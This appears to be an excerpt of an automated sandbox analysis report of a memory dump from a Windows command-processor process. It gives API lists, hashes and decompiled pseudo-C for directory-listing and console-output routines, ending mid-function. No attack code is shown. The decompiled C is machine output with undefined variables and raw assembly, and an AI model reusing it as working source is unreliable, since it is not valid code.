                                    • DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,00000000,00000000,00000000), ref: 011EDE1B
                                    • CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,00000000,00000000,00000001,00080000,00000000,?,?,?), ref: 011EDEAE
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011EDFCB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributeProcThread$CloseCreateErrorHandleLastListProcessmemset$DeleteInfoInitializeStartupUpdateUser_wcsnicmplstrcmp
                                    • String ID: $%01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$D$H$\XCOPY.EXE
                                    • API String ID: 1603632292-3461277227
                                    • Opcode ID: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction ID: 7396ef928c09472166a9c33fab79b4b2353d4f7010d55a68d293c9705eedfb2b
                                    • Opcode Fuzzy Hash: d0212f88b018fa2c7bbe61fd571eaffbaab7243a03d1f4fe3e08752a976e5537
                                    • Instruction Fuzzy Hash: E9C19570A106159EDF3CDBE9AC4CBAA7AF9BB55704F004099E619D7244EB708984CF52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6550, Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 535COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E011E6550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
				struct _SECURITY_DESCRIPTOR* _v0;
				void* _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t187;
				signed int _t190;
				signed int _t191;
				void* _t192;
				signed int _t195;
				signed int _t201;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr _t217;
				signed int _t219;
				signed int _t221;
				signed int _t223;
				signed int* _t228;
				signed int _t237;
				signed int _t240;
				WCHAR* _t241;
				void* _t242;
				signed int _t243;
				void* _t245;
				signed int _t256;
				void* _t257;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				WCHAR* _t281;
				signed int _t282;
				signed int _t285;
				signed int _t286;
				signed int _t306;
				struct _SECURITY_DESCRIPTOR* _t310;
				signed int _t311;
				void* _t312;
				signed int _t313;
				char* _t314;
				struct _SECURITY_DESCRIPTOR* _t315;
				void* _t316;
				intOrPtr _t317;
				intOrPtr* _t331;
				void* _t337;
				void* _t345;
				void* _t364;
				void* _t371;
				void* _t373;
				intOrPtr _t374;
				intOrPtr _t381;
				char* _t383;
				intOrPtr _t388;
				intOrPtr _t389;
				signed int* _t394;
				void* _t395;
				int _t396;
				void* _t399;
				void* _t400;
				signed int _t401;
				signed int _t402;

				_t402 = _t401 & 0xfffffff8;
				E011E8290(0x44d4);
				_t187 =  *0x11fd0b4; // 0x2833377e
				_a17612 = _t187 ^ _t402;
				_t371 = _a4;
				_t310 = _a8;
				_t399 = _a12;
				_t394 = _a16;
				_t316 =  &(_t310->Owner);
				_a4 = _t316;
				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
				_a12 = _t371;
				asm("adc [edx+0x2c], ecx");
				_t190 =  *_t394;
				_t372 = _t190;
				_v0 = _t310;
				_a24 = _t394;
				if((_t190 & 0x00000010) != 0) {
					__eflags = _t190;
					if(_t190 < 0) {
						goto L1;
					}
					 *_t394 = _t190 & 0xffffffef;
					_t195 = E011E65F0(_t394, _a12, _t399, _t394);
					_t372 =  *_t394 | 0x00000010;
					 *_t394 = _t372;
					__eflags = _t195;
					if(_t195 != 0) {
						L5:
						_pop(_t395);
						_pop(_t400);
						_pop(_t312);
						return E011E6FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
					}
					_t372 = _t372 | 0x80000000;
					 *_t394 = _t372;
				}
				L1:
				if((_t372 & 0x00000040) == 0) {
					__eflags = _t372 & 0x00000004;
					if((_t372 & 0x00000004) == 0) {
						__eflags = _t372 & 0x00000402;
						if(__eflags == 0) {
							_t191 =  *(_t310 + 2) & 0x0000ffff;
							__eflags = _t191;
							if(_t191 == 0) {
								_t192 = 0x2c;
							} else {
								_t192 = 0x2c + _t191 * 2;
							}
							_t311 = E011FA49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
							__eflags = _t311;
							if(_t311 == 0) {
								_t373 = 0xe;
								E011F7A11(_t399, _t373);
								_t372 = _t394[0x17];
								_t311 = E011FA3E9(_t399, _t394[0x17],  *_t394, _a4);
							}
							__eflags =  *(_t399 + 8);
							if( *(_t399 + 8) == 0) {
								L4:
								_t195 = _t311;
								goto L5;
							}
							_t195 = E011DB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L4;
						}
						_t325 = _t399;
						_t372 = _t394[0x17];
						_t311 = E011FA2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
						_t200 = 0;
						_a24 = 0;
						__eflags = _t311;
						if(_t311 != 0) {
							L70:
							__eflags =  *(_t399 + 8) - _t200;
							if( *(_t399 + 8) == _t200) {
								L72:
								__eflags =  *_t394 & 0x00100000;
								if(( *_t394 & 0x00100000) == 0) {
									goto L4;
								}
								_t201 = E011E7797(_t325);
								__eflags = _t201;
								if(_t201 == 0) {
									goto L4;
								}
								_a1172 = 1;
								_a1176 = 0x104;
								_a1168 = 0;
								memset( &_a648, 0, 0x104);
								_t402 = _t402 + 0xc;
								__eflags = _a1172;
								_t210 = E011E0C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
								__eflags = _t210;
								if(_t210 < 0) {
									L91:
									__imp__??_V@YAXPAX@Z(_a1168);
									goto L4;
								}
								_t329 = _a1168;
								__eflags = _a1168;
								if(_a1168 == 0) {
									_t329 =  &_a648;
								}
								_t372 = _a1176;
								_t214 = E011E51C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
								__eflags = _t214;
								if(_t214 == 0) {
									_t215 = _a1168;
									__eflags = _t215;
									if(_t215 == 0) {
										_t215 =  &_a648;
									}
									_t372 = 0;
									_t216 =  *0x121c00c(_t215, 0,  &_a48, 0);
									_v16 = _t216;
									__eflags = _t216 - 0xffffffff;
									if(_t216 != 0xffffffff) {
										do {
											_t331 =  &_a40;
											_t372 = _t331 + 2;
											do {
												_t217 =  *_t331;
												_t331 = _t331 + 2;
												__eflags = _t217 - _a16;
											} while (_t217 != _a16);
											__eflags = _t331 - _t372 >> 1 - 2;
											if(__eflags < 0) {
												L85:
												_t372 =  *_t394;
												_t219 = E011F9FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
												_t311 = _t219;
												__eflags = _t311;
												if(_t311 != 0) {
													goto L89;
												}
												__eflags =  *(_t399 + 8) - _t219;
												if( *(_t399 + 8) == _t219) {
													goto L89;
												}
												_t223 = E011DB610(_t311, _t399, _t394);
												_a8 = _t223;
												__eflags = _t223;
												if(_t223 == 0) {
													goto L89;
												}
												__imp__??_V@YAXPAX@Z(_a1152);
												_t195 = _a8;
												goto L5;
											}
											__eflags = _a42 - 0x3a;
											if(__eflags == 0) {
												goto L89;
											}
											goto L85;
											L89:
											_t221 =  *0x121c038(_v16,  &_a32);
											__eflags = _t221;
										} while (_t221 != 0);
										FindClose(_v24);
									}
								}
								goto L91;
							}
							_t325 = _t399;
							_t195 = E011DB610(_t311, _t399, _t394);
							__eflags = _t195;
							if(_t195 != 0) {
								goto L5;
							}
							goto L72;
						}
						__eflags =  *_t394 & 0x00000400;
						if(( *_t394 & 0x00000400) == 0) {
							_t374 =  *0x11fd190; // 0x13
							_t375 = _t374 + 0x13;
							__eflags = _t374 + 0x13;
						} else {
							_t315 = _v0;
							__eflags =  *(_t315 + 2);
							if( *(_t315 + 2) != 0) {
								_t389 =  *0x11fd190; // 0x13
								_t364 = _t399;
								E011F7A11(_t364, _t389 + 0x13);
								_push(_t364);
								E011E6740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
							}
							_t388 =  *0x11fd190; // 0x13
							_t375 = _t388 + 0x20;
						}
						_t337 = _t399;
						E011F7A11(_t337, _t375);
						_t372 =  *_t394;
						_t313 = L"...";
						_a8 = _t313;
						__eflags = _t372 & 0x00040000;
						if((_t372 & 0x00040000) == 0) {
							L42:
							_push(_t337);
							_t325 = _t399;
							_a16 = _a4 + 0x2c;
							_t311 = E011E6740(_t399, _t372, _a4 + 0x2c);
							_t228 = _v4;
							__eflags =  *_t228 & 0x00000400;
							if(( *_t228 & 0x00000400) == 0) {
								L69:
								_t200 = 0;
								__eflags = 0;
								goto L70;
							}
							__eflags = _t228[9] & 0x20000000;
							if((_t228[9] & 0x20000000) == 0) {
								goto L69;
							}
							_a568 = 1;
							_a572 = 0x104;
							_a564 = 0;
							memset( &_a44, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a568;
							_t237 = E011E0C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t237;
							if(_t237 < 0) {
								L67:
								_t372 = L"%s";
								E011E6B76(_t399, L"%s", L" [.]");
								L68:
								__imp__??_V@YAXPAX@Z(_a564);
								_pop(_t325);
								goto L69;
							}
							_t341 = _a564;
							__eflags = _a564;
							if(_a564 == 0) {
								_t341 =  &_a44;
							}
							_t240 = E011E51C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
							__eflags = _t240;
							if(_t240 != 0) {
								goto L67;
							} else {
								_t241 = _a564;
								__eflags = _t241;
								if(_t241 == 0) {
									_t241 =  &_a44;
								}
								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
								_a12 = _t242;
								__eflags = _t242 - 0xffffffff;
								if(_t242 != 0xffffffff) {
									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
									_t372 = L"%s";
									_t345 = _t399;
									__eflags = _t243;
									if(_t243 != 0) {
										E011E6B76(_t345, L"%s", L" [");
										__eflags = _a1208 - 0xa0000003;
										if(_a1208 != 0xa0000003) {
											__eflags = _a1212 - 0xa000000c;
											if(_a1212 != 0xa000000c) {
												_t396 = 6;
												L63:
												_t133 = _t396 + 2; // 0x8
												_t245 = E011E00B0(_t133);
												_v4 = _t245;
												__eflags = _t245;
												if(_t245 != 0) {
													memcpy(_t245, _a4, _t396);
													_t402 = _t402 + 0xc;
													__eflags = 0;
													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
													E011E6B76(_t399, L"%s", _v4);
													E011E0040(_v8);
												}
												_t372 = L"%s";
												E011E6B76(_t399, L"%s", "]");
												_t394 = _a16;
												goto L66;
											}
											_t396 = _a1226 & 0x0000ffff;
											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
											__eflags = _t396;
											if(_t396 != 0) {
												goto L63;
											}
											_t256 = (_a1220 & 0x0000ffff) >> 1;
											__eflags = _t256;
											_t257 = _t402 + 0x4e4 + _t256 * 2;
											L61:
											_t396 = _a1222 & 0x0000ffff;
											_a4 = _t257;
											goto L63;
										}
										_t396 = _a1226 & 0x0000ffff;
										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
										__eflags = _t396;
										if(_t396 != 0) {
											goto L63;
										}
										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
										goto L61;
									}
									_push(L" [...]");
									goto L54;
								} else {
									_push(L" [..]");
									_t372 = L"%s";
									_t345 = _t399;
									L54:
									E011E6B76(_t345, _t372);
									L66:
									CloseHandle(_a12);
									goto L68;
								}
							}
						} else {
							_a16 = 0x101;
							_a20 = 0;
							_a568 = 0;
							_a28 = 0x10;
							_a572 = 1;
							_a576 = 0x104;
							memset( &_a48, 0, 0x104);
							_t402 = _t402 + 0xc;
							__eflags = _a572;
							_t272 = E011E0C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
							__eflags = _t272;
							if(_t272 >= 0) {
								_t273 = E011E00B0(0x10000);
								_v0 = _t273;
								__eflags = _t273;
								if(_t273 != 0) {
									_t354 = _a568;
									__eflags = _a568;
									if(_a568 == 0) {
										_t354 =  &_a48;
									}
									_t277 = E011E51C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
									__eflags = _t277;
									if(_t277 != 0) {
										L33:
										E011E6B76(_t399, L"%s", _t313);
										goto L36;
									} else {
										_t281 = _a568;
										__eflags = _t281;
										if(_t281 == 0) {
											_t281 =  &_a48;
										}
										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
										__eflags = _t282;
										if(_t282 == 0) {
											goto L33;
										} else {
											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
											__eflags = _t285;
											if(_t285 == 0) {
												goto L33;
											}
											_t286 = E011E7797( &_a40);
											__eflags = _t286;
											if(_t286 == 0) {
												L34:
												_push(_t313);
												_t383 = L"%s";
												L35:
												E011E6B76(_t399, _t383);
												__eflags = 0;
												_a16 = 0;
												L36:
												E011E0040(_v0);
												L37:
												__eflags =  *_t394 & 0x00000400;
												_t381 =  *0x11fd190; // 0x13
												if(( *_t394 & 0x00000400) == 0) {
													_t382 = _t381 + 0x2a;
													__eflags = _t381 + 0x2a;
												} else {
													_t382 = _t381 + 0x37;
												}
												E011F7A11(_t399, _t382);
												L41:
												__imp__??_V@YAXPAX@Z(_a568);
												_t372 =  *_t394;
												_pop(_t337);
												goto L42;
											}
											 *0x121c034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
											__eflags = 0;
											if(0 == 0) {
												goto L34;
											}
											_t314 = L"%s";
											E011E6B76(_t399, _t314,  &_a1156);
											E011E6B76(_t399, _t314, "\\");
											_t383 = _t314;
											_push( &_a612);
											goto L35;
										}
									}
								}
								E011E6B76(_t399, L"%s", _t313);
								goto L37;
							}
							E011E6B76(_t399, L"%s", _t313);
							goto L41;
						}
					}
					_t306 = E011FAB79(_t399, _t372, _a4);
					L3:
					_t311 = _t306;
					goto L4;
				}
				_t306 = E011E660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
				goto L3;
			}






































































                                    0x011e6555
                                    0x011e655d
                                    0x011e6562
                                    0x011e6569
                                    0x011e6570
                                    0x011e6574
                                    0x011e6578
                                    0x011e657c
                                    0x011e657f
                                    0x011e6585
                                    0x011e6589
                                    0x011e658c
                                    0x011e658f
                                    0x011e6593
                                    0x011e6596
                                    0x011e6598
                                    0x011e659a
                                    0x011e659e
                                    0x011e65a4
                                    0x011ef9ae
                                    0x011ef9b0
                                    0x00000000
                                    0x00000000
                                    0x011ef9bf
                                    0x011ef9c1
                                    0x011ef9c8
                                    0x011ef9cb
                                    0x011ef9cd
                                    0x011ef9cf
                                    0x011e65ca
                                    0x011e65d1
                                    0x011e65d2
                                    0x011e65d3
                                    0x011e65de
                                    0x011e65de
                                    0x011ef9d5
                                    0x011ef9db
                                    0x011ef9db
                                    0x011e65aa
                                    0x011e65ad
                                    0x011ef9e2
                                    0x011ef9e5
                                    0x011ef9f8
                                    0x011ef9fe
                                    0x011f0030
                                    0x011f0034
                                    0x011f0037
                                    0x011f0044
                                    0x011f0039
                                    0x011f0039
                                    0x011f0039
                                    0x011f0053
                                    0x011f0055
                                    0x011f0057
                                    0x011f005b
                                    0x011f005e
                                    0x011f0067
                                    0x011f0073
                                    0x011f0073
                                    0x011f0075
                                    0x011f0079
                                    0x011e65c8
                                    0x011e65c8
                                    0x00000000
                                    0x011e65c8
                                    0x011f0081
                                    0x011f0086
                                    0x011f0088
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f008e
                                    0x011efa08
                                    0x011efa0b
                                    0x011efa13
                                    0x011efa15
                                    0x011efa17
                                    0x011efa1b
                                    0x011efa1d
                                    0x011efeac
                                    0x011efeac
                                    0x011efeaf
                                    0x011efec0
                                    0x011efec0
                                    0x011efec6
                                    0x00000000
                                    0x00000000
                                    0x011efecc
                                    0x011efed1
                                    0x011efed3
                                    0x00000000
                                    0x00000000
                                    0x011efede
                                    0x011efee8
                                    0x011efef1
                                    0x011eff00
                                    0x011eff0e
                                    0x011eff11
                                    0x011eff27
                                    0x011eff2c
                                    0x011eff2e
                                    0x011f001d
                                    0x011f0024
                                    0x00000000
                                    0x011f002a
                                    0x011eff34
                                    0x011eff3b
                                    0x011eff3d
                                    0x011eff3f
                                    0x011eff3f
                                    0x011eff4a
                                    0x011eff5c
                                    0x011eff61
                                    0x011eff63
                                    0x011eff69
                                    0x011eff70
                                    0x011eff72
                                    0x011eff74
                                    0x011eff74
                                    0x011eff7b
                                    0x011eff85
                                    0x011eff8b
                                    0x011eff8f
                                    0x011eff92
                                    0x011eff98
                                    0x011eff98
                                    0x011eff9c
                                    0x011eff9f
                                    0x011eff9f
                                    0x011effa2
                                    0x011effa5
                                    0x011effa5
                                    0x011effb0
                                    0x011effb3
                                    0x011effbd
                                    0x011effbd
                                    0x011effca
                                    0x011effcf
                                    0x011effd1
                                    0x011effd3
                                    0x00000000
                                    0x00000000
                                    0x011effd5
                                    0x011effd8
                                    0x00000000
                                    0x00000000
                                    0x011effdc
                                    0x011effe1
                                    0x011effe5
                                    0x011effe7
                                    0x00000000
                                    0x00000000
                                    0x011efff0
                                    0x011efff6
                                    0x00000000
                                    0x011efffa
                                    0x011effb5
                                    0x011effbb
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0000
                                    0x011f0009
                                    0x011f000f
                                    0x011f000f
                                    0x011f0017
                                    0x011f0017
                                    0x011eff92
                                    0x00000000
                                    0x011eff63
                                    0x011efeb1
                                    0x011efeb3
                                    0x011efeb8
                                    0x011efeba
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011efeba
                                    0x011efa23
                                    0x011efa29
                                    0x011efa65
                                    0x011efa6b
                                    0x011efa6b
                                    0x011efa2b
                                    0x011efa2b
                                    0x011efa2f
                                    0x011efa33
                                    0x011efa35
                                    0x011efa3b
                                    0x011efa40
                                    0x011efa4b
                                    0x011efa55
                                    0x011efa55
                                    0x011efa5a
                                    0x011efa60
                                    0x011efa60
                                    0x011efa6e
                                    0x011efa70
                                    0x011efa75
                                    0x011efa77
                                    0x011efa7c
                                    0x011efa80
                                    0x011efa86
                                    0x011efc60
                                    0x011efc67
                                    0x011efc69
                                    0x011efc6b
                                    0x011efc74
                                    0x011efc76
                                    0x011efc7a
                                    0x011efc80
                                    0x011efeaa
                                    0x011efeaa
                                    0x011efeaa
                                    0x00000000
                                    0x011efeaa
                                    0x011efc86
                                    0x011efc8d
                                    0x00000000
                                    0x00000000
                                    0x011efc98
                                    0x011efca2
                                    0x011efcab
                                    0x011efcb7
                                    0x011efcc2
                                    0x011efcc5
                                    0x011efcdb
                                    0x011efce0
                                    0x011efce2
                                    0x011efe8b
                                    0x011efe90
                                    0x011efe97
                                    0x011efe9c
                                    0x011efea3
                                    0x011efea9
                                    0x00000000
                                    0x011efea9
                                    0x011efce8
                                    0x011efcef
                                    0x011efcf1
                                    0x011efcf3
                                    0x011efcf3
                                    0x011efd09
                                    0x011efd0e
                                    0x011efd10
                                    0x00000000
                                    0x011efd16
                                    0x011efd16
                                    0x011efd1d
                                    0x011efd1f
                                    0x011efd21
                                    0x011efd21
                                    0x011efd35
                                    0x011efd3b
                                    0x011efd3f
                                    0x011efd42
                                    0x011efd6f
                                    0x011efd75
                                    0x011efd7a
                                    0x011efd7c
                                    0x011efd7e
                                    0x011efd94
                                    0x011efd99
                                    0x011efda4
                                    0x011efdda
                                    0x011efde5
                                    0x011efe29
                                    0x011efe2a
                                    0x011efe2a
                                    0x011efe2d
                                    0x011efe32
                                    0x011efe36
                                    0x011efe38
                                    0x011efe40
                                    0x011efe49
                                    0x011efe4e
                                    0x011efe56
                                    0x011efe5c
                                    0x011efe65
                                    0x011efe65
                                    0x011efe6f
                                    0x011efe76
                                    0x011efe7b
                                    0x00000000
                                    0x011efe7b
                                    0x011efdef
                                    0x011efe00
                                    0x011efe04
                                    0x011efe06
                                    0x00000000
                                    0x00000000
                                    0x011efe10
                                    0x011efe10
                                    0x011efe12
                                    0x011efe19
                                    0x011efe19
                                    0x011efe21
                                    0x00000000
                                    0x011efe21
                                    0x011efdae
                                    0x011efdbf
                                    0x011efdc3
                                    0x011efdc5
                                    0x00000000
                                    0x00000000
                                    0x011efdd1
                                    0x00000000
                                    0x011efdd1
                                    0x011efd80
                                    0x00000000
                                    0x011efd44
                                    0x011efd44
                                    0x011efd49
                                    0x011efd4e
                                    0x011efd85
                                    0x011efd85
                                    0x011efe7f
                                    0x011efe83
                                    0x00000000
                                    0x011efe83
                                    0x011efd42
                                    0x011efa8c
                                    0x011efa8e
                                    0x011efa9b
                                    0x011efaa1
                                    0x011efaad
                                    0x011efab5
                                    0x011efabd
                                    0x011efac4
                                    0x011efacf
                                    0x011efad2
                                    0x011efae8
                                    0x011efaed
                                    0x011efaef
                                    0x011efb08
                                    0x011efb0d
                                    0x011efb11
                                    0x011efb13
                                    0x011efb27
                                    0x011efb2e
                                    0x011efb30
                                    0x011efb32
                                    0x011efb32
                                    0x011efb4c
                                    0x011efb51
                                    0x011efb53
                                    0x011efc08
                                    0x011efc10
                                    0x00000000
                                    0x011efb59
                                    0x011efb59
                                    0x011efb60
                                    0x011efb62
                                    0x011efb64
                                    0x011efb64
                                    0x011efb79
                                    0x011efb7f
                                    0x011efb81
                                    0x00000000
                                    0x011efb87
                                    0x011efb95
                                    0x011efb9b
                                    0x011efb9d
                                    0x00000000
                                    0x00000000
                                    0x011efb9f
                                    0x011efba4
                                    0x011efba6
                                    0x011efc17
                                    0x011efc17
                                    0x011efc18
                                    0x011efc1d
                                    0x011efc1f
                                    0x011efc24
                                    0x011efc26
                                    0x011efc2a
                                    0x011efc2e
                                    0x011efc33
                                    0x011efc33
                                    0x011efc39
                                    0x011efc3f
                                    0x011efc46
                                    0x011efc46
                                    0x011efc41
                                    0x011efc41
                                    0x011efc41
                                    0x011efc4b
                                    0x011efc50
                                    0x011efc57
                                    0x011efc5d
                                    0x011efc5f
                                    0x00000000
                                    0x011efc5f
                                    0x011efbce
                                    0x011efbd4
                                    0x011efbd6
                                    0x00000000
                                    0x00000000
                                    0x011efbdf
                                    0x011efbe9
                                    0x011efbf7
                                    0x011efc03
                                    0x011efc05
                                    0x00000000
                                    0x011efc05
                                    0x011efb81
                                    0x011efb53
                                    0x011efb1d
                                    0x00000000
                                    0x011efb1d
                                    0x011efaf9
                                    0x00000000
                                    0x011efaf9
                                    0x011efa86
                                    0x011ef9ee
                                    0x011e65c6
                                    0x011e65c6
                                    0x00000000
                                    0x011e65c6
                                    0x011e65c1
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: [...]$ [..]$ [.]$...$:
                                    • API String ID: 0-1980097535
                                    • Opcode ID: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction ID: ea77946fa626a114de49e8e16eda3abfc1c29951bf69ad6101efbe4a57f21a6c
                                    • Opcode Fuzzy Hash: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction Fuzzy Hash: C112D2702047029BDB2DDFA8C888AAFB7E5FF98704F04491DFA8597281EB30D945CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DC5CA, Relevance: 30.2, APIs: 20, Instructions: 238COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 68%
                                    			E011DC5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
				signed int _v8;
				short _v16;
				short _v20;
				signed int _v26;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				signed int _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				long _v60;
				signed int _v64;
				void* _v68;
				long _v72;
				long _v76;
				long _v80;
				intOrPtr _v84;
				char _v88;
				void* _v108;
				long _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t66;
				long _t68;
				long _t71;
				char* _t81;
				long _t85;
				intOrPtr _t88;
				signed int _t91;
				long _t93;
				long _t95;
				signed short _t100;
				struct _COORD _t105;
				void* _t114;
				void* _t115;
				long _t119;
				long _t122;
				signed int _t125;
				long _t128;
				void* _t138;
				void* _t141;
				void* _t143;
				signed int _t150;

				_t63 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t63 ^ _t150;
				_v64 = _a8;
				_t141 = __ecx;
				_v76 = __edx;
				_t137 = 0;
				_v72 = 0;
				_t66 = E011E269C(_a8);
				if(_t66 == 0) {
					L13:
					_t114 = 0;
				} else {
					__imp___get_osfhandle(__edx);
					_t114 = _t66;
					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
						goto L13;
					} else {
						_t137 = _v16 - _v20 - 1;
						_v72 = _t137;
					}
				}
				_v60 = _v60 & 0x00000000;
				_t119 = E011DC6F4(_t141, _a4, _v64);
				_t133 = 0x120b980;
				_v64 = _t119;
				_t142 = _t119;
				_v68 = 0x120b980;
				if(_t119 == 0) {
					_t68 = _v60;
					goto L11;
				} else {
					do {
						if(_t114 == 0) {
							_t119 = _v76;
							_t85 = E011E27C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
							__eflags = _t85;
							if(_t85 == 0) {
								L16:
								_t68 = GetLastError();
								_v60 = _t68;
								break;
							} else {
								__eflags = _v88 - _t142 + _t142;
								if(_v88 == _t142 + _t142) {
									goto L9;
								} else {
									goto L16;
								}
							}
						} else {
							if( *0x1218065 != 0) {
								_t128 =  *0x121851c;
								__eflags = _t128 - _t137;
								if(_t128 < _t137) {
									L33:
									_t143 = _t133;
									_t88 = _t133 + _v64 * 2;
									_v84 = _t88;
									__eflags = _t133 - _t88;
									if(_t133 < _t88) {
										while(1) {
											__eflags = _t128 - _t137;
											if(_t128 >= _t137) {
												break;
											}
											_t91 =  *_t143 & 0x0000ffff;
											_t143 = _t143 + 2;
											__eflags = _t91 - 0xa;
											if(_t91 == 0xa) {
												_t128 = _t128 + 1;
												__eflags = _t128;
											}
											__eflags = _t143 - _v84;
											if(_t143 < _v84) {
												continue;
											}
											break;
										}
										 *0x121851c = _t128;
									}
									_t142 = _t143 - _t133 >> 1;
									goto L8;
								} else {
									 *0x121851c = 0;
									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
									__eflags = _t93;
									if(_t93 == 0) {
										L32:
										_t128 =  *0x121851c;
										_t133 = _v68;
										goto L33;
									} else {
										_t95 = WriteConsoleW(_t114,  *0x1218518,  *0x1218514,  &_v60, 0);
										__eflags = _t95;
										if(_t95 == 0) {
											goto L32;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(_t114,  &_v80);
											_t100 = SetConsoleMode(_t114, 0);
											__imp___getch();
											_t137 = _t100 & 0x0000ffff;
											SetConsoleMode(_t114, _v80);
											GetConsoleScreenBufferInfo(_t114,  &_v56);
											_t133 = _v32.dwSize * _v26;
											_push( &_v60);
											_t105 = _v32.dwCursorPosition;
											_push(_t105);
											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
											_push(0x20);
											_push(_t114);
											FillConsoleOutputCharacterW();
											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
											__eflags = (_t100 & 0x0000ffff) - 3;
											if((_t100 & 0x0000ffff) == 3) {
												EnterCriticalSection( *0x1203858);
												 *0x11fd544 = 1;
												LeaveCriticalSection( *0x1203858);
												_t68 = 0;
												L12:
												return E011E6FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
											} else {
												_t137 = _v72;
												goto L32;
											}
										}
									}
								}
							} else {
								_t142 = 0xa0;
								if(_t119 <= 0xa0) {
									_t142 = _t119;
								}
								L8:
								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
									_t68 = GetLastError();
								} else {
									L9:
									_t68 = 0;
								}
								goto L10;
							}
						}
						goto L55;
						L10:
						_t119 = _v64 - _t142;
						_v60 = _t68;
